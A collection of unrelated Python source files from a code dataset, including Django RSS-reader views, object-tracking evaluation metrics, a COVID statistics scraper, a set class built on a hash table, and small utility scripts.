\"\"\"\n Constructor method for initializing the Configuration class\n \"\"\"\n def __init__(self, *args, **kwargs):\n if not hasattr(self, \"logger\"):\n self.logger = logging.getLogger(__name__)\n self.logger.debug(\"Instance <%s>: function call to \\\"%s\\\"\", id(self), self.__init__.__name__)\n\n self.config = ConfigParser.RawConfigParser()\n self.config.readfp(open(\"config/image-organizer.properties\"))\n self.config.set(\"ImageOrganizer\", \"sys.path.root\", os.getcwd())\n\n def get_config(self):\n self.logger.debug(\"Instance <%s>: function call to \\\"%s\\\"\", id(self), self.get_config.__name__)\n return self.config\n","sub_path":"core/Configuration.py","file_name":"Configuration.py","file_ext":"py","file_size_in_byte":778,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"41452069","text":"import json\nimport logging\n\nfrom django.contrib.auth.mixins import LoginRequiredMixin\nfrom django.core.exceptions import ImproperlyConfigured\nfrom django.core.paginator import EmptyPage, PageNotAnInteger, Paginator\nfrom django.conf import settings\nfrom django.http import Http404, HttpResponseForbidden\nfrom django.shortcuts import render, redirect\nfrom django.urls import reverse\nfrom django.utils.decorators import method_decorator\nfrom django.views.decorators.csrf import csrf_exempt\nfrom django.views.generic import View\n\nfrom feeds import api_responses\nfrom feeds.forms import FeedCreateFromURLForm, FeedChangeScheduledUpdatePeriodForm, FeedChangeFeedURLForm, \\\n CommentAddForm\nfrom feeds.models import Feed, Entry, FeedSubscription, Comment\n\nlogger = logging.getLogger(__name__)\n\n\nclass BaseView(View):\n \"\"\"\n This view class (and it's descendants) will run methods listed in self.pre_dispatch_hooks before\n actually calling dispatch(). Those hooks must return a tuple of (WSGIRequest, response (may be None).\n If any of those hooks will return a response instead of None, dispatch() won't be called,\n and this response will be returned instead.\n\n This is done to reduce code duplication and to assure that different views that access same resource\n will behave consistently.\n \"\"\"\n pre_dispatch_hooks = []\n\n def dispatch(self, request, *args, **kwargs):\n request, hooks_response = self.run_hooks(self.pre_dispatch_hooks, request, *args, **kwargs)\n if hooks_response:\n logger.warning(\"Pre-dispatch hooks returned non-empty response, \"\n \"will return it instead of calling dispatch()\")\n return hooks_response\n\n dispatch_response = super().dispatch(request, *args, **kwargs)\n return dispatch_response\n\n def run_hooks(self, hook_list, request, *args, **kwargs):\n # I am sure there are better ways to do this :)\n logger.debug(\"Configured hooks for {}: {}\".format(self.__class__.__name__, hook_list))\n for hook_name in hook_list:\n hook = getattr(self, hook_name)\n if not hook:\n raise ImproperlyConfigured(\"View {} defined {} as one of it's hooks, \"\n \"but it does not have this attribute\".format(self.__class__.__name__,\n hook_name))\n\n logger.debug(\"Running hook {} of {}\".format(hook_name, self.__class__.__name__))\n request, response = hook(request, *args, **kwargs)\n logger.debug(\"Hook {} of {} return values: {}\".format(hook_name,\n self.__class__.__name__,\n (request, response)))\n # Bail out if hook produced a response\n if response:\n logger.debug(\"Hook {} produced a response, aborting hooks iteration and returning\".format(hook_name))\n return request, response\n\n return request, None\n\n\nclass FeedScopedBaseView(BaseView):\n \"\"\"\n This View class will extract a feed id from kwargs, fetch the corresponding Feed model and add it\n to the request object, producing 404 on fetch failures.\n This View will also redirect users that tried to access private feed or it's entries to the login page\n \"\"\"\n\n def __init__(self, **kwargs):\n super().__init__(**kwargs)\n self.pre_dispatch_hooks = [\n \"get_feed_from_kwargs\",\n \"redirect_to_login_for_private_feeds\"\n ]\n\n def get_feed_from_kwargs(self, request, *args, **kwargs):\n try:\n request.feed = Feed.objects.get(pk=kwargs[\"feed_id\"])\n except Feed.DoesNotExist:\n raise Http404\n else:\n return request, None\n\n def redirect_to_login_for_private_feeds(self, request, *args, **kwargs):\n if request.feed.private and request.feed.user != request.user:\n return request, redirect(\"{}?next={}\".format(reverse(\"login\"), request.path))\n else:\n return request, None\n\n\nclass FeedScopedProtectedBaseView(FeedScopedBaseView):\n \"\"\"\n This View will do all of the things that FeedScopedBaseView does, but it will\n also check that request.user is matching the requested Feed owner.\n \"\"\"\n\n def __init__(self, **kwargs):\n super().__init__(**kwargs)\n\n self.pre_dispatch_hooks += [\n \"return_403_if_request_user_does_not_match_feed_user\"\n ]\n\n def return_403_if_request_user_does_not_match_feed_user(self, request, *args, **kwargs):\n if request.feed.user != request.user:\n logger.warning(\"User {} tried to access protected FeedView {}\".format(request.user,\n self.__class__.__name__))\n return request, HttpResponseForbidden()\n else:\n return request, None\n\n\nclass EntryFeedScopedBaseView(FeedScopedBaseView):\n \"\"\"\n This View will do all of the things that FeedScopedBaseView does, but it will\n also extract `entry_id` from kwargs, fetch the corresponding Entry model and add it\n to the request object, producing 404 on fetch failures\n \"\"\"\n\n def __init__(self, **kwargs):\n super().__init__(**kwargs)\n\n self.pre_dispatch_hooks += [\n \"get_entry_from_kwargs\"\n ]\n\n def get_entry_from_kwargs(self, request, *args, **kwargs):\n try:\n request.entry = Entry.objects.get(pk=kwargs[\"entry_id\"])\n except Entry.DoesNotExist:\n raise Http404\n else:\n return request, None\n\n\nclass FeedReadView(LoginRequiredMixin, FeedScopedBaseView):\n template_name = \"feed.html\"\n\n def get(self, request, *args, **kwargs):\n context = {}\n\n logger.debug(\"Displaying {}\".format(request.feed))\n # Sort by updated_at if available, then by fetched_at\n sorted_entries = request.feed.get_all_entries_sorted_by_date()\n annotated_entries = Entry.annotate_entries_with_bookmarks(\n Entry.annotate_entries_with_entryviews(sorted_entries, request.user), request.user)\n\n unseen_entries_count = annotated_entries.filter(seen_by_user=False).count()\n is_user_subscribed_to_this_feed = request.feed.is_user_subscribed_to_feed(request.user)\n\n paginator = Paginator(annotated_entries, settings.ITEMS_PER_PAGE) # Show ITEMS_PER_PAGE feed items per page\n\n page = request.GET.get('page')\n logger.debug(\"Requested page: {}\".format(page))\n try:\n feed_entries_page = paginator.page(page)\n except PageNotAnInteger:\n feed_entries_page = paginator.page(1)\n except EmptyPage:\n feed_entries_page = paginator.page(paginator.num_pages)\n\n context.update({\"feed\": request.feed,\n \"feed_entries_page\": feed_entries_page,\n \"unseen_entries_count\": unseen_entries_count,\n \"total_entries_count\": annotated_entries.count(),\n \"is_user_subscribed_to_this_feed\": is_user_subscribed_to_this_feed})\n\n return render(request, self.template_name, context)\n\n\nclass FeedCreateFromURLView(LoginRequiredMixin, BaseView):\n template_name = \"feed_create_from_url.html\"\n\n def get(self, request, *args, **kwargs):\n return render(request, self.template_name, {\"feed_creation_form\": FeedCreateFromURLForm()})\n\n def post(self, request, *args, **kwargs):\n feed_creation_form = FeedCreateFromURLForm(request.POST)\n\n if feed_creation_form.is_valid():\n feed_url = feed_creation_form.cleaned_data.get(\"feed_url\")\n private = feed_creation_form.cleaned_data.get(\"private\", False)\n scheduled_update_period = feed_creation_form.cleaned_data.get(\"scheduled_update_period\")\n\n logger.info(\"Will now try to create a Feed (feed url {}, private {})\".format(feed_url, private))\n try:\n created_feed = Feed.create_from_feed_url(request.user, feed_url, private, scheduled_update_period,\n create_periodic_task=True)\n except Feed.CreationFromFeedUrlFailed as e:\n logger.exception(\"Failed to create feed from {} due to: {}: {}\".format(feed_url,\n e.__class__.__name__,\n e))\n feed_creation_form.add_error(None, \"Failed to create a feed from provided URL. Please make sure that \"\n \"you have entered the correct URL for a feed.\")\n return render(request, self.template_name, {\"feed_creation_form\": feed_creation_form})\n else:\n logger.info(\"{} created, redirecting\".format(created_feed))\n return redirect(reverse(\"feeds:feed\", kwargs={\"feed_id\": created_feed.pk}))\n else:\n return render(request, self.template_name, {\"feed_creation_form\": feed_creation_form})\n\n\nclass FeedDeleteView(LoginRequiredMixin, FeedScopedProtectedBaseView):\n template_name = \"feed_delete.html\"\n\n def get(self, request, *args, **kwargs):\n return render(request, self.template_name, {\"feed\": request.feed})\n\n def post(self, request, *args, **kwargs):\n logger.debug(\"Deleting {}\".format(request.feed))\n request.feed.delete()\n return redirect(reverse(\"feeds:browse\"))\n\n\nclass FeedUpdateView(LoginRequiredMixin, FeedScopedBaseView):\n template_name = \"feed.html\"\n\n def post(self, request, *args, **kwargs):\n logger.debug(\"Updating {}\".format(request.feed))\n # Sort by updated_at if available, then by fetched_at\n\n try:\n request.feed.update()\n except request.feed.FeedUpdateFailed as e:\n logger.warning(\"Feed update failed due to: {}: {}\".format(e.__class__.__name__, e))\n finally:\n return redirect(reverse(\"feeds:feed\", kwargs={\"feed_id\": request.feed.pk}))\n\n\nclass FeedChangeScheduledUpdatePeriodView(LoginRequiredMixin, FeedScopedProtectedBaseView):\n template_name = \"feed_change_scheduled_update_period.html\"\n\n def get(self, request, *args, **kwargs):\n return render(request, self.template_name, {\"feed\": request.feed,\n \"feed_change_period_form\": FeedChangeScheduledUpdatePeriodForm()})\n\n def post(self, request, *args, **kwargs):\n feed_change_period_form = FeedChangeScheduledUpdatePeriodForm(request.POST)\n\n if feed_change_period_form.is_valid():\n scheduled_update_period = feed_change_period_form.cleaned_data.get(\"scheduled_update_period\")\n request.feed.scheduled_update_period = scheduled_update_period\n request.feed.save()\n request.feed.update_periodic_task_period()\n\n return redirect(reverse(\"feeds:feed\", kwargs={\"feed_id\": request.feed.pk}))\n else:\n return render(request, self.template_name, {\"feed\": request.feed,\n \"feed_change_period_form\": feed_change_period_form})\n\n\nclass FeedChangeFeedURLView(LoginRequiredMixin, FeedScopedProtectedBaseView):\n template_name = \"feed_change_feed_url.html\"\n\n def get(self, request, *args, **kwargs):\n return render(request, self.template_name, {\"feed\": request.feed,\n \"feed_change_url_form\": FeedChangeFeedURLForm()})\n\n def post(self, request, *args, **kwargs):\n feed_change_url_form = FeedChangeFeedURLForm(request.POST)\n\n if feed_change_url_form.is_valid():\n feed_url = feed_change_url_form.cleaned_data.get(\"feed_url\")\n delete_entries = feed_change_url_form.cleaned_data.get(\"delete_entries\")\n\n request.feed.feed_url = feed_url\n request.feed.save()\n\n try:\n request.feed.update(delete_entries=delete_entries)\n except Feed.FeedUpdateFailed as e:\n logger.debug(\"{} update after URL change failed due to: {}: {}\".format(request.feed,\n e.__class__.__name__,\n e))\n\n return redirect(reverse(\"feeds:feed\", kwargs={\"feed_id\": request.feed.pk}))\n else:\n render(request, self.template_name, {\"feed\": request.feed,\n \"feed_change_url_form\": feed_change_url_form})\n\n\nclass FeedMakePrivateView(LoginRequiredMixin, FeedScopedProtectedBaseView):\n def post(self, request, *args, **kwargs):\n\n if request.feed.private:\n logger.info(\"{} is already private\".format(request.feed))\n\n else:\n logger.info(\"Making {} private\".format(request.feed))\n request.feed.private = True\n request.feed.save()\n\n return redirect(reverse(\"feeds:feed\", kwargs={\"feed_id\": request.feed.pk}))\n\n\nclass FeedMakePublicView(LoginRequiredMixin, FeedScopedProtectedBaseView):\n def post(self, request, *args, **kwargs):\n if request.feed.private:\n logger.info(\"Making {} public\".format(request.feed))\n request.feed.private = False\n request.feed.save()\n else:\n logger.info(\"{} is already public\".format(request.feed))\n\n return redirect(reverse(\"feeds:feed\", kwargs={\"feed_id\": request.feed.pk}))\n\n\nclass FeedSubscribeView(LoginRequiredMixin, FeedScopedBaseView):\n def post(self, request, *args, **kwargs):\n if request.feed.is_user_subscribed_to_feed(request.user):\n logger.info(\"{} is not subscribed to {}, nothing to do\".format(request.user, request.feed))\n else:\n logger.debug(\"Subscribing {} to {}\".format(request.user, request.feed))\n request.feed.subscribe_user_to_feed(request.user)\n\n return redirect(reverse(\"feeds:feed\", kwargs={\"feed_id\": request.feed.pk}))\n\n\nclass FeedUnsubscribeView(LoginRequiredMixin, FeedScopedBaseView):\n def post(self, request, *args, **kwargs):\n logger.debug(\"Toggling {} subscription\".format(request.feed))\n\n if request.feed.is_user_subscribed_to_feed(request.user):\n logger.debug(\"Unubscribing {} from {}\".format(request.user, request.feed))\n request.feed.unsubscribe_user_from_feed(request.user)\n else:\n logger.info(\"{} is not subscribed to {}, nothing to do\".format(request.user, request.feed))\n\n return redirect(reverse(\"feeds:feed\", kwargs={\"feed_id\": request.feed.pk}))\n\n\nclass FeedsBrowseView(LoginRequiredMixin, BaseView):\n template_name = \"browse_feeds.html\"\n\n def get(self, request, *args, **kwargs):\n all_public_feeds = list(Feed.objects.filter(private=False))\n user_private_feeds = list(Feed.objects.filter(private=True, user=request.user))\n\n # sort by_date\n feeds = all_public_feeds + user_private_feeds\n logger.debug(\"Getting all feeds\")\n logger.debug(\"All feeds: {} \".format(feeds))\n if feeds:\n sorted_feeds = sorted(feeds, key=lambda x: x.updated_at if x.updated_at else x.fetched_at)\n sorted_feeds.reverse()\n\n sorted_feeds_with_unseen_entries_by_user_count = [\n {\"feed\": feed,\n \"entries_unseen_by_user_count\": feed.get_entries_unseen_by_user(request.user).count(),\n \"date\": feed.updated_at if feed.updated_at else feed.fetched_at,\n \"user_subscribed\": feed.is_user_subscribed_to_feed(request.user)} for feed in sorted_feeds]\n\n paginator = Paginator(sorted_feeds_with_unseen_entries_by_user_count, settings.ITEMS_PER_PAGE)\n\n page = request.GET.get('page')\n logger.debug(\"Requested page: {}\".format(page))\n try:\n feeds_with_counts_page = paginator.page(page)\n except PageNotAnInteger:\n feeds_with_counts_page = paginator.page(1)\n except EmptyPage:\n feeds_with_counts_page = paginator.page(paginator.num_pages)\n\n else:\n logger.debug(\"No feeds!\")\n feeds_with_counts_page = None\n\n return render(request, self.template_name, {\"feeds_with_counts_page\": feeds_with_counts_page})\n\n\nclass FeedsSubscribedBrowseView(LoginRequiredMixin, BaseView):\n template_name = \"browse_subscribed_feeds.html\"\n\n def get(self, request, *args, **kwargs):\n # sort by_date\n\n feed_subscriptions = FeedSubscription.objects.filter(user=request.user)\n\n feeds = [feed_subscription.feed for feed_subscription in feed_subscriptions]\n\n if feeds:\n sorted_feeds = sorted(feeds, key=lambda x: x.updated_at if x.updated_at else x.fetched_at)\n sorted_feeds.reverse()\n\n feeds_with_counts = [\n {\"feed\": feed,\n \"entries_unseen_by_user_count\": feed.get_entries_unseen_by_user(request.user).count(),\n \"date\": feed.updated_at if feed.updated_at else feed.fetched_at,\n } for feed in sorted_feeds]\n\n paginator = Paginator(feeds_with_counts, settings.ITEMS_PER_PAGE)\n\n page = request.GET.get('page')\n logger.debug(\"Requested page: {}\".format(page))\n\n try:\n feeds_with_counts_page = paginator.page(page)\n except PageNotAnInteger:\n feeds_with_counts_page = paginator.page(1)\n except EmptyPage:\n feeds_with_counts_page = paginator.page(paginator.num_pages)\n\n else:\n logger.debug(\"No subscribed feeds!\")\n feeds_with_counts_page = None\n\n return render(request, self.template_name, {\"feeds_with_counts_page\": feeds_with_counts_page})\n\n\nclass EntryReadView(LoginRequiredMixin, EntryFeedScopedBaseView):\n template_name = \"entry.html\"\n\n def get(self, request, *args, **kwargs):\n request.entry.mark_as_seen_by_user(request.user)\n\n comments = request.entry.comment_set.order_by(\"-added_at\")\n comment_add_form = CommentAddForm()\n\n ctx = {\"entry\": request.entry,\n \"bookmarked_by_user\": request.entry.is_bookmarked_by_user(request.user),\n \"comments\": comments,\n \"comment_add_form\": comment_add_form}\n\n return render(request, self.template_name, ctx)\n\n\nclass CommentAddView(LoginRequiredMixin, EntryFeedScopedBaseView):\n def post(self, request, *args, **kwargs):\n comment_add_form = CommentAddForm(request.POST)\n if comment_add_form.is_valid():\n request.entry.add_comment(comment_add_form.cleaned_data[\"body\"], request.user)\n\n return redirect(reverse(\"feeds:feed-entry-read\", kwargs={\"feed_id\": request.feed.pk,\n \"entry_id\": request.entry.pk}))\n\n\nclass CommentDeleteView(LoginRequiredMixin, EntryFeedScopedBaseView):\n def post(self, request, *args, **kwargs):\n try:\n comment_id = kwargs[\"comment_id\"]\n comment = Comment.objects.get(pk=comment_id)\n except Comment.DoesNotExist:\n logger.debug(\"Comment with ID {} does not exist\".format(comment_id))\n else:\n if request.user != comment.user:\n logger.debug(\"Can't delete {} because request.user {} differs with comment user {}\"\n \"\".format(comment, request.user, comment.user))\n else:\n logger.debug(\"Deleting {}\".format(comment))\n comment.delete()\n\n return redirect(reverse(\"feeds:feed-entry-read\", kwargs={\"feed_id\": request.feed.pk,\n \"entry_id\": request.entry.pk}))\n\n\nclass JSONAPIView(BaseView):\n \"\"\"\n Parses JSON from incoming request and, if successful, adds JSON to request as an attribute\n \"\"\"\n\n def __init__(self, **kwargs):\n super().__init__(**kwargs)\n self.pre_dispatch_hooks = [\"get_json_from_request\"]\n\n def get_json_from_request(self, request, *args, **kwargs):\n if request.method.lower() in [\"post\", \"put\", \"patch\"]:\n try:\n request.json = json.loads(request.body.decode('utf-8'))\n except Exception as e:\n logger.warning(\"Bad JSON passed, HTTP body: {}, JSON parsing exception: {}: {}\"\n \"\".format(request.body, e.__class__.__name__, e))\n return request, api_responses.ApiBadRequestResponse(\n reason=\"JSON data is malformed or not present in the request body\")\n else:\n return request, None\n\n\n@method_decorator(csrf_exempt, \"dispatch\")\nclass APILoginRequiredMixin(LoginRequiredMixin):\n \"\"\"\n Returns a JSON response with 403 rather than redirecting to login\n \"\"\"\n\n def handle_no_permission(self):\n return api_responses.ApiUnauthorizedResponse(reason=\"You must be logged in to perform this request\")\n\n\nclass ToggleBookmarkView(APILoginRequiredMixin, JSONAPIView):\n def post(self, request, *args, **kwargs):\n entry_id = request.json.get(\"entry_id\")\n if not entry_id:\n return api_responses.ApiBadRequestResponse(reason=\"entry_id field is missing from the request JSON data\")\n\n try:\n entry = Entry.objects.get(pk=entry_id)\n except Entry.DoesNotExist:\n logger.warning(\"Entry with ID {} does not exist\".format(entry_id))\n return api_responses.ApiNotFoundResponse(reason=\"Entry with ID {} does not exist\".format(entry_id))\n\n bookmarked_by_user = entry.toggle_bookmark(request.user)\n logger.debug(\"{} bookmarked by {}: {}\".format(entry, request.user, bookmarked_by_user))\n\n return api_responses.ApiOkResponse(data={\"bookmarked_by_user\": bookmarked_by_user})\n","sub_path":"sc_rss_reader/feeds/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":22121,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"445537454","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Thu Mar 17 10:19:38 2016\r\n\r\n@author: Jiangfeng Xiong\r\n\"\"\"\r\nimport matplotlib.pyplot as pl\r\nimport numpy as np\r\n\r\n\r\n#position and ground_truth format:\r\n#top_left_x top_left_y width height\r\ndef calculate_overlap(A,B):\r\n leftA = A[:,0];\r\n bottomA = A[:,1];\r\n rightA = leftA + A[:,2] - 1;\r\n topA = bottomA + A[:,3] - 1;\r\n \r\n leftB = B[:,0];\r\n bottomB = B[:,0];\r\n rightB = leftB + B[:,2] - 1;\r\n topB = bottomB + B[:,3]- 1;\r\n \r\n tmp = (max(0, min(rightA, rightB) - max(leftA, leftB)+1 ))* (max(0, min(topA, topB) - max(bottomA, bottomB)+1 ));\r\n areaA = A[:,2] * A[:,3];\r\n areaB = B[:,2] * B[:,3];\r\n overlap = tmp/(areaA+areaB-tmp)\r\n \r\n return overlap\r\n \r\ndef calculate_precision(positions,ground_truth,title,show=True):\r\n \r\n max_threshold = 50\r\n precision = np.zeros((max_threshold,1))\r\n \r\n # \r\n positions[:,0] = positions[:,0] + positions[:,2]/2\r\n positions[:,1] = positions[:,1] + positions[:,3]/2\r\n \r\n ground_truth[:,0] = ground_truth[:,0] + ground_truth[:,2]/2\r\n ground_truth[:,1] = ground_truth[:,1] + ground_truth[:,3]/2\r\n \r\n \r\n distances = np.sqrt((positions[:,0]-ground_truth[:,0])**2 \\\r\n + (positions[:,1]-ground_truth[:,1])**2)\r\n \r\n for p in xrange(max_threshold):\r\n precision[p] = np.size(np.nonzero(distances<=p))*1.0/np.size(distances)\r\n \r\n if show == True:\r\n t = np.arange(0,max_threshold)\r\n pl.plot(t,precision,'b')\r\n pl.title(title)\r\n pl.xlabel('Threshold')\r\n pl.ylabel('Precision')\r\n pl.show()\r\n return precision\r\ndef caculate_success(positions,ground_truth,title,show=True):\r\n success = np.zeros(50,1)\r\n overlap = calculate_overlap(positions,ground_truth)\r\n for n in xrange(50):\r\n p = 1.0/50*n\r\n success[n] = np.size(np.nonzero(overlap>=p))/np.size(success)\r\n if show == True:\r\n t = np.arange(0,1,0.02)\r\n pl.plot(t,success,'r')\r\n pl.title(title)\r\n pl.xlabel('Threshold')\r\n pl.ylabel('Success')\r\n pl.show()","sub_path":"evaluate_method.py","file_name":"evaluate_method.py","file_ext":"py","file_size_in_byte":2116,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"259426057","text":"import unittest\n\ndef solve(arr):\n\tif arr is None:\n\t\treturn arr\n\tcount = 0\n\tfor elm in arr:\n\t\tcount += elm\n\t\tif count < 0:\n\t\t\tcount = 0\n\treturn count\n\nclass Test(unittest.TestCase):\n\t\n\tdata = [([34,-50,42,14,-5,86], 137),\n\t\t\t([-5,-1,-8,-9], 0)]\n\n\tdef test(self):\n\t\tfor case, expected in self.data:\n\t\t\tactual = solve(case)\n\t\t\tself.assertEquals(actual, expected)\n\nif __name__ == '__main__':\n\tunittest.main()\n","sub_path":"Problem_49/problem.py","file_name":"problem.py","file_ext":"py","file_size_in_byte":405,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"341417897","text":"#!/usr/local/bin/python3\n\nfile = open(\"countries.txt\", \"r\")\n\ncountries=[]\n\nfor line in file:\n line = line.strip()\n countries.append(line)\n\nfile.close\n\nprint(len(countries))\n\n#Loop through list and print countries that start with \"U\"\nfor country in countries:\n if country[0] == \"U\":\n print(country)\n","sub_path":"fileread.py","file_name":"fileread.py","file_ext":"py","file_size_in_byte":314,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"411996939","text":"import requests as rq\r\nfrom bs4 import BeautifulSoup as BS\r\n\r\n\r\ndef split_num(num: int) -> str:\r\n num = str(num)\r\n for ind in range(len(num), 0, -3):\r\n if ind != len(num):\r\n num = num[:ind] + \" \" + num[ind:]\r\n return num\r\n\r\n\r\n\r\ndef get_data() -> dict:\r\n url = \"https://www.worldometers.info/coronavirus/\"\r\n html = rq.get(url).text\r\n soup = BS(html, \"html.parser\")\r\n\r\n db = {}\r\n\r\n for el in soup.select(\".main_table_countries_div > .table-bordered > tbody\")[:2]:\r\n for unit in el.select(\"tr\"):\r\n data = []\r\n for s in unit.find_all(\"td\"):\r\n n = s.get_text().strip().replace(\",\", \"\").replace(\"+\", \"\")\r\n if n in [\"\", \"N/A\"]:\r\n n = \"-\"\r\n data += [n]\r\n data = data[1:15]\r\n # country, population, total_cases, active_cases, total_recovered, total_death, new_cases, new_recovered, new_deaths\r\n if data[0] != None:\r\n if not(data[0].isdigit()) and data[0].strip() != \"Total:\":\r\n db[data[0].lower()] = {\r\n \"country\": data[0],\r\n \"population\": split_num(data[13]),\r\n \"total_case\": split_num(data[1]),\r\n \"active_case\": split_num(data[7]),\r\n \"total_recover\": split_num(data[5]),\r\n \"total_death\": split_num(data[3]),\r\n \"new_case\": split_num(data[2]),\r\n \"new_recover\": split_num(data[6]),\r\n \"new_death\": split_num(data[4]),\r\n }\r\n return db\r\n","sub_path":"src/utils/webparser.py","file_name":"webparser.py","file_ext":"py","file_size_in_byte":1655,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"320638573","text":"import pylab\nimport os\nfrom pkg_resources import resource_filename\n\n\ndef plot(name: str, capacity: float) -> None:\n times = []\n values = []\n results_dir = resource_filename('membrane_capacity_test', 'results')\n for result_file in os.listdir(os.path.join(results_dir, 'raw_data')):\n if name in result_file:\n with open(os.path.join(results_dir, 'raw_data', result_file)) as data:\n for line in data:\n time, value = line.split()\n times.append(time)\n values.append(value)\n pylab.plot(times, values, label='{} pF'.format(capacity))\n\ndef save(name: str) -> None:\n pylab.ylabel('Membrane potential, mV')\n pylab.xlabel('time, ms')\n pylab.title('Comparison of three neurons with different membrane capacity', fontsize=12)\n pylab.legend()\n results_dir = resource_filename('membrane_capacity_test', 'results')\n pylab.savefig(os.path.join(results_dir, 'img', '{}.png'.format(name)))\n","sub_path":"un/lab/nest_practice/membrane_capacity_test/src/tools/plotter.py","file_name":"plotter.py","file_ext":"py","file_size_in_byte":993,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"417896154","text":"# class Solution:\n# def letterCasePermutation(self, S: str) -> List[str]:\n# f = lambda x: (x.lower(), x.upper()) if x.isalpha() else x\n# return map(\"\".join, itertools.product(*map(f,S)))\nclass Solution:\n def letterCasePermutation(self, S: str) -> List[str]:\n res=['']\n for x in S:\n if x.isalpha():\n res = [i+x for i in res] + [i+x.swapcase() for i in res]\n else:\n res = [i+x for i in res]\n return res","sub_path":"位运算/784. 字母大小写全排列/Solution.py","file_name":"Solution.py","file_ext":"py","file_size_in_byte":496,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"314136160","text":"import torch\nimport numpy as np\nfrom PIL import Image, ImageFilter\nimport os\nimport matplotlib.pyplot as plt\nimport torch.utils.data as data\nfrom torchvision.datasets import ImageNet\nfrom torchvision.transforms import RandomCrop, RandomRotation, RandomHorizontalFlip, RandomVerticalFlip, Compose, ToPILImage, CenterCrop, Normalize, Grayscale, Resize\nfrom tqdm import tqdm\n\nclass Dataset(data.Dataset):\n def __init__(self, settings, validation=None, mode=None):\n # dataset = settings['general']['dataset']\n dataset = settings\n self.size = 0\n if dataset == 'imageNET':\n self.images = 'data/imageNET' \n #self.labels = pathtolabels\n self.size = 1\n \n elif dataset == 'YFCC100M':\n self.images = 'data/YFCC100M'\n # self.labels = pathtolabels \n #self.size = len(self.images)\n \n def __getitem__(self, index):\n idx = np.random.randint(0,self.size)\n img_batch = np.load(f'{self.images}/train_data_batch_1', allow_pickle = True)\n return img_batch['data'][idx]\n #return ImageNet(self.images).loader('train_data_batch_1')\n \n def __len__(self):\n return self.size\n \ndef load_data(settings, transformation=None, n_train=None, n_test=None):\n ds = Dataset(settings)\n try:\n dataloader = torch.utils.data.DataLoader(\n ds,\n shuffle=True,\n batch_size = 1\n )\n dl = dataloader\n for items in tqdm(dl):\n plt.imshow(items)\n \n except UnboundLocalError:\n print('error')\n \n \nif __name__ == \"__main__\":\n \n load_data('imageNET')\n","sub_path":"utils/load_data2.py","file_name":"load_data2.py","file_ext":"py","file_size_in_byte":1688,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"285053947","text":"\nhashtable = __import__('8_hashtables', fromlist=['HashTable'])\nHashTable = hashtable.HashTable\n\n\nclass Set(object):\n\n def __init__(self, elements=None):\n \"\"\"Initialize this new empty set structure with the given initial size.\"\"\"\n self.map = HashTable()\n self.size = 0 # property that tracks the number of elements in constant time\n if elements is not None:\n for element in elements:\n self.size += 1 \n self.map.set(element, True)\n \n def contains(self, element):\n \"\"\"return a boolean indicating whether element is in this set.\"\"\"\n # return element in self.elements -> return self.elements.___contains__(element)\n return self.map.contains(element)\n\n def add(self, element):\n \"\"\"add element to this set, if not present already\"\"\"\n # check if its unique by \n # if not self.contains(element):\n if self.map.contains(element) == False:\n self.map.set(element, None)\n self.size += 1\n return self.size\n\n def remove(self, element):\n \"\"\"remove element from this set, if present, or else raise KeyError\"\"\"\n # if element in self.elements:\n # if self.elements.___contains__(element):\n # if self.contains(element):\n self.map.delete(element)\n self.size -= 1\n return self.size\n # else:\n # raise KeyError('Element not found: {}'.format(element))\n \n def union(self, other_set):\n \"\"\"return a new set that is the union of this set and other_set\"\"\"\n new_set = Set()\n # for element in self.map:\n # for element in self.elements.__iter__():\n for element in self.map.keys():\n new_set.add(element) # or new_set.add(element.data[0]) ?\n\n for element in other_set.map.keys():\n if not new_set.contains(element):\n new_set.add(element)\n\n return new_set\n \n def intersection(self, other_set):\n \"\"\"return a new set that is the intersection of this set and other_set\"\"\"\n new_set = Set()\n for element in other_set.map.keys():\n if self.contains(element):\n new_set.add(element)\n\n return new_set\n\n def difference(self, other_set):\n \"\"\"return a new set that is the difference of this set and other_set\"\"\"\n new_set = Set()\n for element in self.map.keys():\n if other_set.contains(element):\n new_set.add(element)\n\n return new_set\n \n def issubset(self, other_set):\n \"\"\"Return true if all the elements in a set exist in the other set, False if not.\"\"\"\n for item in self.map.keys():\n if item not in other_set.map.keys():\n return False\n return True","sub_path":"Refactored-Code/10_set.py","file_name":"10_set.py","file_ext":"py","file_size_in_byte":2789,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"425215984","text":"from urllib.request import urlopen\nfrom urllib.error import URLError\nfrom urllib.error import HTTPError \nimport json\nimport pprint\nimport pytest\n\n\n\ndef InputVkIds():\n print('Введите список id, через запятую:')\n id = input()\n return id\n\ndef SendRequestVk(ids,url):\n request = url.format(id = ids)\n print('Сформированный запрос:', request)\n obj={} \n try:\n request_obj = urlopen(request)#отправка на сервер\n obj = json.loads(request_obj.read())#конвертируем ответ сервера в JSON\n except URLError:\n raise \n except HTTPError:\n raise \n return obj\n\ndef JsonConsoleWriter(json):\n if (json.get('response') != None and json.get('response')!=\"error\"):#двойная проверка JSON 1: для случая когда сервер отработал запрос, но вернул JSON с ошибкой в котором нет поля response 2: для случая когда сервер вообще ничего не вернул, это вариант exept \n print('Ответ сервера:')\n resp=json.get('response')#складываем в переменную значение поля response\n for field in resp:\n print(' ' + '_'*70 + '\\n')\n print(\" First name: \" + str(field['first_name']))\n print(\" Last name: \" + str(field['last_name']))\n print(\" Nickname: \" + str(field['nickname']))\n print(\" Status: \" + str(field['status']))\n print(\" Online: \" + str(field['online']))\n print(\" Sex: \" + str(field['sex']))\n print(\" Last_seen: \" + str(field['last_seen'])+ '\\n')\n print(' ' + '_'*70 + '\\n') \n 